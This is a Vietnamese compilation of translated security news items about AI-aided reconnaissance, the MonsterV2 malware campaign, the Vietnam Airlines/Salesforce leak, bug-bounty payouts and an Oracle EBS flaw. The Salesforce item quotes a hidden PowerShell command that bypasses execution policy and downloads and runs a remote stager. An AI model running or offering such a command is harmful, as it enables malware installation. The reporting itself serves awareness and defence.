Điểm mạnh của nó nằm ở khả năng hiểu dữ liệu phi cấu trúc ở quy mô lớn, rất phù hợp cho việc do thám. AI có thể phân tích và sắp xếp khối lượng lớn thông tin hướng ngoại: nội dung trang web, tiêu đề, bản ghi DNS, cấu trúc trang, luồng đăng nhập, cấu hình SSL, v.v. Nó có thể liên kết dữ liệu này với các công nghệ, khuôn khổ và công cụ bảo mật đã biết, giúp kẻ tấn công hiểu rõ hơn về những gì đang diễn ra đằng sau hậu trường.

Ngôn ngữ không còn là rào cản nữa. AI có thể trích xuất ý nghĩa từ thông báo lỗi bằng bất kỳ ngôn ngữ nào, đối chiếu tài liệu kỹ thuật giữa các khu vực và nhận dạng các quy ước đặt tên hoặc mẫu mà người đánh giá có thể không nhận thấy.

Nó cũng vượt trội trong việc so khớp ngữ cảnh. Nếu một ứng dụng đang sử dụng một thư viện JavaScript có phiên bản, AI có thể xác định khung, kiểm tra các rủi ro liên quan và so khớp các kỹ thuật đã biết dựa trên ngữ cảnh đó. Không phải vì nó đang phát minh ra các phương pháp mới, mà vì nó biết cách tham chiếu chéo dữ liệu một cách nhanh chóng và kỹ lưỡng.

Tóm lại, AI đang trở thành một lớp trinh sát và làm giàu dữ liệu cực kỳ hiệu quả. Nó giúp kẻ tấn công ưu tiên và tập trung, không phải bằng cách làm điều gì đó mới mẻ mà bằng cách làm điều gì đó quen thuộc với quy mô và tính nhất quán cao hơn nhiều.

AI đang thay đổi các cuộc tấn công ứng dụng web như thế nào#

Tác động của AI trở nên rõ ràng hơn khi bạn xem xét cách nó định hình các kỹ thuật tấn công web phổ biến:

Bắt đầu với phương pháp tấn công vét cạn (brute force). Theo truyền thống, kẻ tấn công dựa vào từ điển tĩnh để đoán thông tin đăng nhập. AI cải thiện điều này bằng cách tạo ra các tổ hợp thực tế hơn bằng cách sử dụng các mẫu ngôn ngữ khu vực, giả định dựa trên vai trò và quy ước đặt tên cụ thể cho tổ chức mục tiêu. AI cũng nhận dạng loại hệ thống mà nó đang tương tác, cho dù đó là cơ sở dữ liệu, hệ điều hành hay bảng điều khiển quản trị cụ thể, và sử dụng ngữ cảnh đó để thử các thông tin đăng nhập mặc định phù hợp nhất. Phương pháp tiếp cận có mục tiêu này giúp giảm nhiễu và tăng khả năng thành công với ít lần thử hơn và thông minh hơn.

AI cũng cải thiện khả năng diễn giải. Nó có thể xác định những thay đổi nhỏ trong hành vi đăng nhập, chẳng hạn như thay đổi cấu trúc trang, sự thay đổi trong thông báo lỗi hoặc hành vi chuyển hướng, và điều chỉnh cách tiếp cận cho phù hợp. Điều này giúp giảm thiểu kết quả dương tính giả và cho phép xoay vòng nhanh hơn khi thử nghiệm thất bại.

Ví dụ, một tập lệnh truyền thống có thể giả định rằng đăng nhập thành công được biểu thị bằng sự thay đổi 70% nội dung trang. Tuy nhiên, nếu người dùng được chuyển hướng đến một trang đích tạm thời — trang trông khác biệt nhưng cuối cùng lại dẫn đến lỗi như "Tài khoản bị khóa sau quá nhiều lần thử" — thì tập lệnh có thể phân loại sai thành công. AI có thể phân tích nội dung, mã trạng thái và luồng một cách toàn diện hơn, nhận ra rằng việc đăng nhập không thành công và điều chỉnh chiến lược cho phù hợp.

Nhận thức về ngữ cảnh chính là yếu tố tạo nên sự khác biệt giữa AI với các công cụ so khớp mẫu truyền thống. Một lỗi dương tính giả phổ biến của các công cụ thu thập thông tin xác thực truyền thống là thông tin xác thực giữ chỗ:

Thoạt nhìn, nó có vẻ chứa thông tin xác thực được mã hóa cứng. Nhưng thực tế, nó chỉ là một trình giữ chỗ vô hại tham chiếu đến tên miền example.com. Công cụ truyền thống vẫn đánh dấu nó. Ngược lại, AI đánh giá bối cảnh xung quanh và nhận ra đây không phải là một bí mật thực sự. Trong quá trình thử nghiệm, chúng tôi đã thấy các mô hình gắn nhãn "Nhạy cảm: sai" với "Độ tin cậy: cao", giúp lọc bỏ các kết quả dương tính giả để giảm nhiễu.

AI cũng cải thiện cách kẻ tấn công khám phá hành vi của ứng dụng. Trong quy trình làm mờ, nó có thể đề xuất các đầu vào mới dựa trên kết quả quan sát được và tinh chỉnh các đầu vào đó khi ứng dụng phản hồi. Điều này giúp phát hiện các lỗi logic nghiệp vụ, kiểm soát truy cập bị hỏng hoặc các lỗ hổng tinh vi khác mà không phải lúc nào cũng kích hoạt cảnh báo.

Về mặt thực thi, AI giúp tạo ra các tải trọng dựa trên thông tin tình báo về mối đe dọa theo thời gian thực. Điều này cho phép các nền tảng mô phỏng các kỹ thuật mới được quan sát nhanh hơn. Các tải trọng này không được triển khai một cách mù quáng. Chúng được xem xét, điều chỉnh cho phù hợp với môi trường và kiểm tra độ chính xác cũng như an toàn trước khi đưa vào sử dụng. Điều này giúp rút ngắn khoảng cách giữa các mối đe dọa mới nổi và việc xác thực có ý nghĩa.

Trong các tình huống phức tạp hơn, AI có thể tích hợp dữ liệu bị lộ vào chính cuộc tấn công. Nếu nền tảng phát hiện thông tin nhận dạng cá nhân như tên hoặc địa chỉ email trong quá trình kiểm tra, nó có thể tự động áp dụng dữ liệu đó vào giai đoạn tiếp theo. Điều này bao gồm các hành động như nhồi nhét thông tin xác thực, mạo danh hoặc di chuyển ngang—phản ánh cách kẻ tấn công thực sự có thể thích ứng tại thời điểm đó.

Kết hợp lại, những khả năng này giúp các cuộc tấn công do AI điều khiển trở nên hiệu quả hơn, thích ứng hơn và thuyết phục hơn. Các kỹ thuật cốt lõi vẫn giữ nguyên. Sự khác biệt nằm ở tốc độ, độ chính xác và khả năng áp dụng ngữ cảnh - điều mà các phòng thủ không thể bỏ qua.

Suy nghĩ lại về sự phơi sáng trong thời đại AI#

Tác động của AI lên quy trình trinh sát tạo ra sự thay đổi trong cách các bên phòng thủ cần suy nghĩ về khả năng bị lộ. Việc chỉ đánh giá những gì có thể tiếp cận được: dải IP, cổng mở, dịch vụ bị lộ bên ngoài là không đủ. AI mở rộng định nghĩa để bao gồm những gì có thể suy ra dựa trên ngữ cảnh.

Điều này bao gồm siêu dữ liệu, quy ước đặt tên, tên biến JavaScript, thông báo lỗi và thậm chí cả các mẫu nhất quán trong cách triển khai cơ sở hạ tầng của bạn. AI không cần quyền truy cập root để khai thác giá trị từ môi trường của bạn. Nó chỉ cần một vài hành vi có thể quan sát được và một tập huấn luyện đủ lớn để hiểu được chúng.

Phơi nhiễm là một quang phổ. Về mặt kỹ thuật, bạn có thể "an toàn" nhưng vẫn cung cấp đủ manh mối để kẻ tấn công xây dựng bản đồ về kiến ​​trúc, ngăn xếp công nghệ hoặc quy trình xác thực của bạn. Đó chính là loại thông tin chuyên sâu mà AI rất giỏi khai thác.

Các công cụ bảo mật thường ưu tiên các chỉ báo rủi ro trực tiếp: lỗ hổng đã biết, cấu hình sai, thành phần chưa được vá hoặc hoạt động đáng ngờ. Nhưng AI lại mở ra một hướng đi khác. Nó có thể suy ra sự hiện diện của các thành phần dễ bị tấn công không phải bằng cách quét trực tiếp mà bằng cách nhận dạng các mẫu hành vi, manh mối kiến ​​trúc hoặc phản hồi API khớp với các đường dẫn tấn công đã biết. Suy luận này không tự kích hoạt cảnh báo, nhưng có thể định hướng cho kẻ tấn công ra quyết định và thu hẹp phạm vi tìm kiếm điểm xâm nhập.

Trong một thế giới mà AI có thể nhanh chóng phân tích môi trường, mô hình "quét và vá" cũ là không đủ. Các nhà phòng thủ cần giảm thiểu những gì có thể học được chứ không chỉ những gì có thể bị khai thác.

Điều này thay đổi gì đối với những người bảo vệ#

Khi AI tăng tốc độ trinh sát và ra quyết định, bên phòng thủ cần phải phản ứng với mức độ tự động hóa và trí tuệ tương đương. Nếu kẻ tấn công đang sử dụng AI để nghiên cứu môi trường của bạn, bạn cần sử dụng AI để hiểu những gì chúng có thể tìm thấy. Nếu chúng đang kiểm tra cách hệ thống của bạn hoạt động, bạn cần kiểm tra chúng trước.

Đây chính là định nghĩa mới về phơi sáng. Nó không chỉ là những gì có thể tiếp cận được. Nó là những gì có thể được phân tích, diễn giải và biến thành hành động. Và nếu bạn không liên tục xác nhận nó, bạn sẽ không nhận ra những gì môi trường xung quanh thực sự đang tiết lộ.

Việc nhìn nhận bề mặt tấn công của bạn qua góc nhìn của kẻ tấn công và xác thực khả năng phòng thủ của bạn bằng chính những kỹ thuật mà chúng sử dụng không còn là điều dễ dàng nữa. Đó là cách thực tế duy nhất để theo kịp.

Khám phá nghiên cứu về mối đe dọa AI mới nhất của Pentera Labs. Đăng ký tham dự Hội nghị vSummit về Nghiên cứu Mối đe dọa AI và đón đầu làn sóng tấn công tiếp theo.

Bài viết này được viết và đóng góp bởi Alex Spivakovsky, Phó chủ tịch phụ trách nghiên cứu và an ninh mạng tại Pentera.

Theo : TheHackerNews

Nhóm nghiên cứu mối đe dọa Proofpoint mô tả nhóm hoạt động đe dọa này là tinh vi, tận dụng việc chèn mã độc vào web và kiểm tra bộ lọc như một phần trong chuỗi tấn công.

"TA585 đáng chú ý vì nó dường như sở hữu toàn bộ chuỗi tấn công của mình bằng nhiều kỹ thuật phân phối khác nhau", các nhà nghiên cứu Kyle Cucci, Tommy Madjar và Selena Larson cho biết . "Thay vì tận dụng các tác nhân đe dọa khác – chẳng hạn như trả tiền phân phối, mua quyền truy cập từ các nhà môi giới truy cập ban đầu, hoặc sử dụng hệ thống phân phối lưu lượng của bên thứ ba – TA585 tự quản lý cơ sở hạ tầng, việc phân phối và cài đặt phần mềm độc hại."

MonsterV2 là một trojan truy cập từ xa (RAT), trình đánh cắp và trình tải, được Proofpoint phát hiện lần đầu tiên trên các diễn đàn tội phạm vào tháng 2 năm 2025. Điều đáng chú ý là MonsterV2 còn được gọi là Aurotun Stealer (viết sai chính tả của "autorun") và trước đây đã được phân phối thông qua CastleLoader (hay còn gọi là CastleBot).

Các chiến dịch lừa đảo phân phối phần mềm độc hại đã được phát hiện bằng cách sử dụng các chiêu trò lấy cảm hứng từ Sở Thuế vụ Hoa Kỳ (IRS) để lừa người dùng nhấp vào các URL giả mạo dẫn đến tệp PDF, sau đó liên kết đến một trang web sử dụng chiến thuật kỹ thuật xã hội ClickFix để kích hoạt mã độc bằng cách chạy lệnh độc hại trong hộp thoại Run của Windows hoặc thiết bị đầu cuối PowerShell. Lệnh PowerShell được thiết kế để thực thi tập lệnh PowerShell giai đoạn tiếp theo triển khai MonsterV2.

Các đợt tấn công tiếp theo được phát hiện vào tháng 4 năm 2025 đã sử dụng mã độc JavaScript trên các trang web hợp pháp có lớp phủ xác minh CAPTCHA giả để bắt đầu cuộc tấn công thông qua ClickFix, cuối cùng dẫn đến việc phát tán phần mềm độc hại thông qua lệnh PowerShell.

Các phiên bản đầu tiên của chiến dịch này đã phân phối Lumma Stealer, trước khi TA585 chuyển sang MonsterV2 vào đầu năm 2025. Điều thú vị là JavaScript inject và cơ sở hạ tầng liên quan (intlspring[.]com) cũng có liên quan đến việc phân phối Rhadamanthys Stealer.

Chiến dịch thứ ba do TA585 thực hiện đã sử dụng thông báo qua email từ GitHub được kích hoạt khi gắn thẻ người dùng GitHub trong các thông báo bảo mật giả mạo có chứa URL dẫn đến các trang web do tác nhân kiểm soát.

Cả hai cụm hoạt động - xoay quanh các hoạt động chèn web và cảnh báo GitHub giả mạo - đều có liên quan đến CoreSecThree, theo PRODAFT , là một "khung phức tạp" được biết là đã hoạt động kể từ tháng 2 năm 2022 và đã "liên tục" được sử dụng để phát tán phần mềm độc hại đánh cắp.

MonsterV2 là phần mềm độc hại đầy đủ tính năng có thể đánh cắp dữ liệu nhạy cảm, hoạt động như một công cụ cắt xén bằng cách thay thế địa chỉ tiền điện tử trong bảng tạm của hệ thống bị nhiễm bằng địa chỉ ví do tác nhân đe dọa cung cấp, thiết lập điều khiển từ xa bằng Hidden Virtual Network Computing (HVNC), nhận và thực thi lệnh từ máy chủ bên ngoài và tải xuống các phần mềm bổ sung.

Phần mềm độc hại này được một tin tặc nói tiếng Nga bán với giá 800 đô la Mỹ mỗi tháng cho phiên bản "Tiêu chuẩn", trong khi phiên bản "Doanh nghiệp", đi kèm với trình đánh cắp, trình tải, HVNC và hỗ trợ Giao thức DevTools (CDP) của Chrome, có giá 2.000 đô la Mỹ mỗi tháng. Một điểm đáng chú ý của trình đánh cắp là nó tránh lây nhiễm sang các quốc gia thuộc Cộng đồng các Quốc gia Độc lập (CIS).

MonsterV2 thường được đóng gói bằng trình mã hóa C++ có tên là SonicCrypt, do đó cho phép nó tránh bị phát hiện bằng cách chạy một loạt các kiểm tra chống phân tích trước khi giải mã và tải trọng.

Sau khi được khởi chạy, phần mềm độc hại sẽ giải mã và phân giải các hàm API Windows quan trọng cho hoạt động của nó, đồng thời nâng cao đặc quyền. Sau đó, nó tiếp tục giải mã cấu hình nhúng để kết nối với máy chủ chỉ huy và điều khiển (C2), cũng như xác định hành động tiếp theo dựa trên các tham số được thiết lập -

• anti_dbg, nếu được đặt thành True, phần mềm độc hại sẽ cố gắng phát hiện và tránh các trình gỡ lỗi đang được sử dụng

• anti_sandbox, nếu được đặt thành True, phần mềm độc hại sẽ cố gắng phát hiện hộp cát và thực hiện một số kỹ thuật chống hộp cát cơ bản

• aurotun (chính lỗi chính tả này đã đặt cho nó cái tên Aurotun Stealer), nếu được đặt thành True, phần mềm độc hại sẽ cố gắng thiết lập tính bền bỉ trên máy chủ

• priviledge_escalation, nếu được đặt thành True, phần mềm độc hại sẽ cố gắng nâng cao đặc quyền của nó

Nếu phần mềm độc hại thiết lập kết nối thành công với máy chủ C2, nó sẽ gửi thông tin hệ thống cơ bản và vị trí địa lý của hệ thống bằng cách gửi yêu cầu đến "api.ipify[.]org". Phản hồi từ máy chủ chứa lệnh cần thực thi trên máy chủ. Một số tính năng được hỗ trợ được liệt kê dưới đây:

• Thực hiện chức năng đánh cắp thông tin và đưa dữ liệu ra máy chủ

• Thực hiện lệnh tùy ý thông qua cmd.exe hoặc PowerShell

• Chấm dứt, tạm dừng và tiếp tục các tiến trình mục tiêu

• Thiết lập kết nối HVNC với hệ thống bị nhiễm

• Chụp ảnh màn hình máy tính

• Bắt đầu một keylogger

• Liệt kê, thao tác, sao chép và trích xuất các tập tin

• Tắt hoặc làm sập hệ thống

• Tải xuống và thực thi các tải trọng giai đoạn tiếp theo như StealC và Remcos RAT

"Tuy nhiên, hoạt động này không liên quan đến TA585. Đáng chú ý, với StealC, các payload MonsterV2 đã được cấu hình để sử dụng cùng một máy chủ C2 với payload StealC bị thả", Proofpoint cho biết. "TA585 là một tác nhân đe dọa độc đáo với khả năng nhắm mục tiêu và phát tán tiên tiến. Trong bối cảnh mối đe dọa tội phạm mạng liên tục thay đổi, TA585 đã áp dụng các chiến lược hiệu quả để lọc, phát tán và cài đặt phần mềm độc hại."

Theo : TheHackerNews

Đánh giá sơ bộ:

• Dữ liệu bị lộ gồm những thông tin như sau: Họ tên, ngày tháng năm sinh, số điện thoại, địa chỉ email, địa chỉ nhà.

• Lượng dữ liệu: Hơn 23 triệu bản ghi, cũ nhất ngày 23/11/2020, mới nhất ngày 20/06/2025.

Lưu ý: Hiện chưa có thông báo chính thức từ Vietnam Airlines hay các cơ quan quản lý. Tất cả thông tin ở đây chỉ mang tính chất tham khảo.

Kiểm tra thông tin cá nhân có bị lộ không:

• Truy cập Have I Been Pwned: https://haveibeenpwned.com.

• Nhập vào địa chỉ email và bấm nút “Check”.

• Lưu ý công cụ này kiểm tra bằng địa chỉ email. Nếu bạn không đăng ký email khi mua vé hay dùng dịch vụ của Vietnam Airlines, Have I Been Pwned sẽ không biết thông tin của bạn có bị lộ hay chưa.

Việc cần làm để bảo vệ bản thân và gia đình:

• Kiểm tra thông tin cá nhân có bị lộ không sử dụng Have I Been Pwned.

• Cảnh giác các cuộc gọi lừa đảo liên quan đến Vietnam Airlines.

• Chờ thông tin chính thức từ Vietnam Airlines và các cơ quan quản lý.

Một số thông tin thêm:

• Nhóm hacker thực hiện là Scattered LAPSUS$ Hunters, đây là tên mới của ShinyHunters sau khi “sáp nhập” với một nhóm hacker khác. ShinyHunters chính là nhóm hacker đã rao bán dữ liệu CIC. Trên trang web công bố dữ liệu Vietnam Airlines cũng có nhắc đến dữ liệu CIC.

  

• Salesforce cung cấp giải pháp quản lý khách hàng (CRM). Nhóm hacker tiết lộ họ đã xâm nhập vào tài khoản Salesforce của 39 công ty, trong đó có Vietnam Airlines, Google, Cisco, Disney, FedEx, v.v.

• Nghĩa là nhóm hacker không trực tiếp xâm nhập vào hệ thống Vietnam Airlines, mà xâm nhập vào tài khoản Salesforce của hãng hàng không này và trích xuất dữ liệu từ đó. Xem thêm phân tích của Google về cách tấn công của nhóm hacker này.

• Sau khi tống tiền Salesforce không thành, nhóm hacker đã công bố dữ liệu của một số công ty. Ngoài Vietnam Airlines, còn có dữ liệu của Qantas, GAP Inc., v.v.

• Các tổ chức đang sử dụng Salesforce nên tham khảo hướng dẫn của Google và Salesforce để kiện toàn an ninh.

• Theo : Thái | Hacker | Kỹ sư tin tặc

Xuất hiện vào giữa năm 2025, nhóm này đã hoàn thiện chiến thuật của mình để khai thác các cấu hình sai trong danh tính đám mây và API bị lộ.

Các báo cáo ban đầu xuất hiện khi nhiều khách hàng của Salesforce nhận thấy các truy vấn bất thường đối với phiên bản quản lý quan hệ khách hàng (CRM) của họ vào đêm khuya, cho thấy sự hiện diện của một công cụ trích xuất tự động.

Khi các bản ghi pháp y được tích lũy, các nhà điều tra nhận ra rằng khối lượng và phạm vi dữ liệu được truy cập vượt xa các cuộc xâm nhập trước đó.

Trong chiến dịch mới nhất này , kẻ tấn công đã kết hợp giữa các chiêu trò lừa đảo có mục tiêu và đánh cắp thông tin đăng nhập để giành được chỗ đứng ban đầu.

Trang web rò rỉ dữ liệu Salesforce của Bling Libra (Nguồn – Palo Alto Networks)

Các nạn nhân cho biết họ nhận được email có vẻ ngoài giống thật yêu cầu cập nhật bảo mật bắt buộc, nhưng trong đó lại phát tán một macro Office độc ​​hại.

Sau khi thực thi, macro sẽ liên lạc với máy chủ chỉ huy và điều khiển từ xa để cài đặt trình tải nhẹ.

Các nhà phân tích của Palo Alto Networks lưu ý rằng trình tải này được viết bằng Go và biên dịch bằng các ký hiệu bị loại bỏ, khiến cho việc thực hiện kỹ thuật đảo ngược trở nên khó khăn hơn.

Sau đó, trình tải xác thực mã thông báo API và khởi tạo quy trình thu thập dữ liệu nhiều giai đoạn.

Tác động của vụ vi phạm này không chỉ giới hạn ở dữ liệu cá nhân bị lộ; các chiến lược bán hàng độc quyền, dự báo về quy trình bán hàng và các cuộc đàm phán nhạy cảm với khách hàng đều bị đe dọa.

Nhiều tổ chức phụ thuộc rất nhiều vào Salesforce cho các hoạt động quan trọng, nghĩa là bất kỳ sự thỏa hiệp nào cũng có thể dẫn đến gián đoạn hoạt động và tổn hại đến danh tiếng.

Những ước tính ban đầu cho thấy nhóm này có thể đã trích xuất dữ liệu với tốc độ liên tục trên 500 gigabyte mỗi giờ, đánh cắp hồ sơ theo từng đợt thông qua các kênh được mã hóa để tránh bị phát hiện.

Cơ chế lây nhiễm

Khi xem xét kỹ hơn cơ chế lây nhiễm, ta thấy sự nhấn mạnh mang tính chiến lược vào khả năng ẩn núp và dai dẳng.

Sau khi trình thả macro ban đầu thực thi, trình dàn dựng tập lệnh PowerShell sẽ được khởi chạy thông qua một dòng lệnh như sau:

powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"

Trình dàn dựng này sẽ kiểm tra các chỉ báo hộp cát trước khi truy xuất toàn bộ trình tải dựa trên Go. Sau đó, trình tải sẽ giải mã thông tin đăng nhập được lưu trữ trong Windows Credential Manager bằng CredReadAPI và xác thực với Salesforce REST API bằng tài khoản dịch vụ có đặc quyền thấp nhất đáp ứng các yêu cầu truy cập dữ liệu.

Sau khi được xác thực, phần mềm độc hại sẽ liệt kê các lược đồ đối tượng và xây dựng động các truy vấn SOQL để truy xuất và xử lý hàng loạt bản ghi. Mỗi hàng loạt được lưu vào bộ nhớ đệm và mã hóa bằng ChaCha20 trước khi được truyền qua HTTPS đến điểm cuối trích xuất dữ liệu chuyên dụng.

Để đảm bảo tính bền bỉ, phần mềm độc hại sẽ đăng ký một tác vụ được lên lịch có tên, UpdaterSvckích hoạt sau mỗi hai giờ. Tác vụ này xác thực sự hiện diện của tệp nhị phân trình tải, tải lại nếu có thay đổi và tiếp tục trích xuất từ ​​ID bản ghi thành công gần nhất.

Cách tiếp cận tỉ mỉ của nhóm đối với việc trốn tránh giới hạn tỷ lệ API và thu thập thông tin xác thực nhấn mạnh sự hiểu biết sâu sắc về môi trường đám mây gốc.

Bằng cách kết hợp kỹ thuật xã hội tinh vi, công cụ tùy chỉnh và chiến thuật kiên trì bền bỉ , Scattered Lapsus$ Hunters đã chứng minh khả năng đáng gờm trong việc xâm phạm các phiên bản Salesforce của doanh nghiệp ở quy mô lớn.

Theo : Cyber Security News

HackerOne quản lý hơn 1.950 chương trình tiền thưởng lỗi và cung cấp dịch vụ tiết lộ lỗ hổng, kiểm tra xâm nhập và bảo mật mã cho nhiều tổ chức.

Danh sách khách hàng của công ty bao gồm các công ty lớn như Anthropic, Crypto.com, General Motors, GitHub, Goldman Sachs, Uber và các cơ quan chính phủ như Bộ Quốc phòng Hoa Kỳ.

Theo một báo cáo được công bố đầu tuần này, mức chi trả trung bình hàng năm cho tất cả các chương trình đang hoạt động là khoảng 42.000 đô la. Trong khi đó, 100 chương trình tiền thưởng lỗi hàng đầu trên nền tảng này đã chi trả 51 triệu đô la từ ngày 1 tháng 7 năm 2024 đến ngày 30 tháng 6 năm 2025.

"Trong 12 tháng qua, các chương trình tiền thưởng lỗi của HackerOne đã chi trả tổng cộng 81 triệu đô la, tăng 13% so với cùng kỳ năm trước. Chỉ riêng 10 chương trình hàng đầu đã chiếm tới 21,6 triệu đô la", công ty cho biết .

"Ở cấp độ nhà nghiên cứu, 100 người có thu nhập cao nhất mọi thời đại đã kiếm được tổng cộng 31,8 triệu đô la, trong đó các nhà nghiên cứu cá nhân hiện nay thường xuyên vượt qua mức thu nhập hàng năm sáu con số."

HackerOne nhìn lại một năm (HackerOne)

HackerOne lưu ý rằng số lượng lỗ hổng AI đã tăng hơn 200%, trong đó lỗ hổng tiêm mã nhanh tăng vọt tới 540%, xác nhận chúng là mối đe dọa phát triển nhanh nhất trong bảo mật AI.

Đồng thời, các vấn đề bảo mật như XSS (tấn công xuyên trang) và SQLi (tiêm SQL) đang giảm dần, trong khi các lỗi ủy quyền, bao gồm kiểm soát truy cập không đúng cách và IDOR (tham chiếu đối tượng trực tiếp không an toàn), đang có sự gia tăng đáng kể trong các báo cáo.

Tổng cộng, 1.121 chương trình tiền thưởng lỗi trên HackerOne đã bao gồm AI vào phạm vi năm 2025, tăng 270% so với cùng kỳ năm trước, với các tác nhân hỗ trợ AI tự động gửi hơn 560 báo cáo hợp lệ.

Công ty cho biết thêm rằng 70% trong số hơn 1.820 nhà nghiên cứu được khảo sát trong năm ngoái đã sử dụng các công cụ AI trong quy trình làm việc của họ "để nâng cao khả năng săn bắn của họ".

Giám đốc điều hành HackerOne, Kara Sprague cho biết : "Các lỗ hổng AI đã tăng hơn 200% trong năm nay, trong khi các doanh nghiệp mở rộng các sáng kiến ​​bảo mật AI với tốc độ gần gấp ba lần so với năm ngoái" .

"Cùng lúc đó, một thế hệ 'hacker sinh học' mới - các nhà nghiên cứu bảo mật sử dụng AI để nâng cao khả năng săn mồi - đang thúc đẩy việc phát hiện các vấn đề bảo mật ở quy mô chưa từng có."

Theo : Bleeping Computer ^® LLC

Kể từ khi chương trình ra mắt vào năm 2020, Apple đã trao 35 triệu đô la cho 800 nhà nghiên cứu bảo mật, trong đó công ty trả 500.000 đô la cho một số báo cáo được gửi.

Mức thưởng cao nhất đã được tăng gấp đôi lên 2 triệu đô la cho việc báo cáo các lỗ hổng có thể dẫn đến việc xâm nhập từ xa mà không cần nhấp chuột (không cần tương tác của người dùng), tương tự như các cuộc tấn công phần mềm gián điệp đánh thuê . Tuy nhiên, khoản tiền thưởng có thể lên tới 5 triệu đô la thông qua hệ thống thưởng.

Apple cho biết: “Đây là số tiền chưa từng có trong ngành và là khoản tiền thưởng lớn nhất mà chúng tôi biết trong bất kỳ chương trình tiền thưởng nào - và hệ thống tiền thưởng của chúng tôi, cung cấp phần thưởng bổ sung cho việc bỏ qua Chế độ khóa và các lỗ hổng được phát hiện trong phần mềm beta, có thể tăng gấp đôi phần thưởng này, với khoản tiền thưởng tối đa vượt quá 5 triệu đô la ” .

Các khoản thanh toán khác được tăng lên hoặc đưa ra theo chương trình mới bao gồm:

• Tấn công từ xa bằng một cú nhấp chuột (tương tác của người dùng) - 1.000.000 đô la

• Tấn công không dây gần - 1.000.000 đô la

• Truy cập iCloud trái phép rộng rãi - 1.000.000 đô la

• Chuỗi khai thác WebKit dẫn đến thực thi mã tùy ý không được ký - 1.000.000 đô la

• Tấn công vào thiết bị bị khóa bằng quyền truy cập vật lý - 500.000 đô la

• Thoát khỏi hộp cát ứng dụng - 500.000 đô la

• Thoát khỏi hộp cát WebKit chỉ bằng một cú nhấp chuột - 300.000 đô la

• macOS Gatekeeper vượt qua hoàn toàn mà không cần tương tác của người dùng - 100.000 đô la

• Giải thưởng khuyến khích trị giá 1.000 đô la cho các báo cáo có tác động thấp nhưng hợp lệ

Apple cho biết họ chưa bao giờ nhận được báo cáo nào chứng minh việc vượt qua Gatekeeper hoàn toàn mà không có sự tương tác của người dùng hoặc quyền truy cập iCloud trái phép rộng rãi, do đó, đây là hai điểm thách thức lớn đối với những người săn tiền thưởng lỗi.

Ngoài ra, Apple cho biết họ "chưa bao giờ quan sát thấy một cuộc tấn công thực tế nào mà không cần nhấp chuột được thực hiện hoàn toàn thông qua kết nối không dây", ám chỉ đến giải thưởng 'Kết nối không dây' trị giá 1 triệu đô la, tăng từ mức 250.000 đô la trước đó.

Danh mục này cũng đang được mở rộng, hiện bao gồm các chip do Apple phát triển như modem C1 và C1X và chip không dây N1.

Đến năm 2026, Apple có kế hoạch phân phối một nghìn thiết bị iPhone 17 được bảo mật cho các thành viên của các tổ chức xã hội dân sự có nguy cơ cao bị phần mềm gián điệp đánh thuê nhắm mục tiêu.

Các thiết bị tương tự sẽ hỗ trợ Chương trình thiết bị nghiên cứu bảo mật của Apple vào năm tới, các nhà nghiên cứu bảo mật có thể đăng ký trước ngày 31 tháng 10.

Gã khổng lồ công nghệ này hy vọng rằng việc tăng tiền thưởng sẽ có tác động bổ sung đến sự phát triển của các chuỗi tấn công tinh vi từ các nhà cung cấp phần mềm gián điệp, vì các nhà nghiên cứu sẽ có động lực hơn trong việc tìm kiếm và báo cáo các vấn đề bảo mật.

Để bảo vệ người dùng khỏi các cuộc tấn công phần mềm gián điệp tinh vi, Apple đã triển khai các biện pháp bảo vệ tiên tiến trên iOS như Chế độ khóa và Thực thi toàn vẹn bộ nhớ , khiến việc phát triển và thực hiện các cuộc tấn công phần mềm gián điệp lén lút trở nên tốn kém hơn.

Theo : Bleeping Computer ^® LLC

Được theo dõi với mã CVE-2025-61884 , lỗ hổng tiết lộ thông tin này trong thành phần UI thời gian chạy ảnh hưởng đến EBS phiên bản 12.2.3 đến 12.2.14 và có thể cho phép kẻ tấn công chưa xác thực đánh cắp dữ liệu nhạy cảm từ xa sau khi khai thác thành công.

"Lỗ hổng này có thể bị khai thác từ xa mà không cần xác thực, tức là có thể bị khai thác qua mạng mà không cần tên người dùng và mật khẩu. Oracle khuyến nghị khách hàng áp dụng các bản cập nhật hoặc biện pháp giảm thiểu được cung cấp trong Cảnh báo Bảo mật này càng sớm càng tốt", Oracle cho biết .

"Lỗ hổng bảo mật này đã nhận được Điểm cơ bản CVSS là 7,5. Nếu khai thác thành công, lỗ hổng này có thể cho phép truy cập vào các tài nguyên nhạy cảm", Rob Duhart, Giám đốc An ninh của Oracle cho biết thêm .

Oracle đã phát hành bản vá CVE-2025-61884 gần hai tuần sau chiến dịch tống tiền Clop nhắm vào các giám đốc điều hành tại nhiều công ty , sau đó công ty đã liên kết chiến dịch này với các lỗ hổng EBS được vá vào tháng 7 năm 2025 và sau đó là một lỗ hổng Oracle EBS khác hiện được theo dõi là CVE-2025-61882.

Kể từ đó, công ty an ninh mạng CrowdStrike cho biết họ lần đầu tiên phát hiện Clop khai thác CVE-2025-61882 dưới dạng lỗ hổng zero-day kể từ đầu tháng 8 trong các cuộc tấn công đánh cắp dữ liệu và cảnh báo rằng các nhóm đe dọa khác cũng có thể đã tham gia vào các cuộc tấn công.

Các nhà nghiên cứu bảo mật của watchTowr Labs cũng phát hiện ra rằng CVE-2025-61882 là một chuỗi lỗ hổng có thể cho phép kẻ tấn công chưa xác thực thực thi mã từ xa, bằng chứng là một bản khai thác bằng chứng khái niệm (PoC) (có dấu thời gian là tháng 5 năm 2025 ) bị băng nhóm tội phạm mạng Scattered Lapsus$ Hunters rò rỉ trực tuyến .

Nhóm tống tiền Clop đứng sau các chiến dịch đánh cắp dữ liệu lớn khác nhắm vào lỗ hổng zero-day trong Accellion FTA , GoAnywhere MFT , Cleo và MOVEit Transfer , trong đó MOVEit Transfer đã ảnh hưởng đến hơn 2.770 tổ chức .

Oracle vẫn chưa gắn thẻ lỗ hổng CVE-2025-61884 đã được vá vào cuối tuần là đã bị khai thác trong thực tế và vẫn chưa liên kết nó với các cuộc tấn công CVE-2025-61882.

Tuy nhiên, vì các phiên bản Oracle EBS kết nối internet đang là mục tiêu tấn công chủ động, nên người bảo vệ được khuyến cáo nên áp dụng bản vá CVE-2025-61884 ngoài băng tần càng sớm càng tốt.

Theo : Bleeping Computer ^® LLC